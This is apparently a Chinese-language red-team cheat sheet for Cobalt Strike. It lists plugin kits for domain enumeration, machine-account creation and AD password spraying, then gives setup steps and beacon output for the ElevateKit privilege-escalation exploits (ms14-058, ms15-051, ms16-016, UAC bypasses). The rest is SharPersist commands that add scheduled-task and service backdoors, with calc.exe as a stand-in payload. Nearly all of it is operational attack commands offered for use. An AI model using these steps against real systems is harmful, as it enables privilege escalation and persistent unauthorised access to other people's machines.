加载脚本
https://cobalt-strike.github.io/community_kit/
https://github.com/outflanknl/C2-Tool-Collection
添加机器账户
枚举域信息
AD密码喷射等
https://github.com/k8gege/Ladon
https://github.com/rsmudge/ElevateKit 提权脚本
>git clone https://github.com/rsmudge/ElevateKit.git
>git clone https://github.com/TheKingOfDuck/myScripts.git
Cobalt Strike -> Scripts 选择elevate.cna加载
提权的EXP列表就会增加已经加入的模块
beacon> runasadmin
Beacon Command Elevators
========================
Exploit Description
------- -----------
ms14-058 TrackPopupMenu Win32k NULL Pointer Dereference (CVE-2014-4113)
ms15-051 Windows ClientCopyImage Win32k Exploit (CVE 2015-1701)
ms16-016 mrxdav.sys WebDav Local Privilege Escalation (CVE 2016-0051)
svc-exe Get SYSTEM via an executable run as a service
uac-schtasks Bypass UAC with schtasks.exe (via SilentCleanup)
uac-token-duplication Bypass UAC with Token Duplication
权限维持
https://github.com/0xthirteen/MoveKit
https://github.com/fireeye/SharPersist
列出
SharPersist -t schtaskbackdoor -m list
SharPersist -t startupfolder -m list
SharPersist -t schtask -m list
添加后门
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add
SharPersist -t schtaskbackdoor -n "Something Cool" -m remove
SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Service" -m add
SharPersist -t service -n "Some Service" -m remove
SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add
SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly
SharPersist -t schtask -n "Some Task" -m remove
最后更新于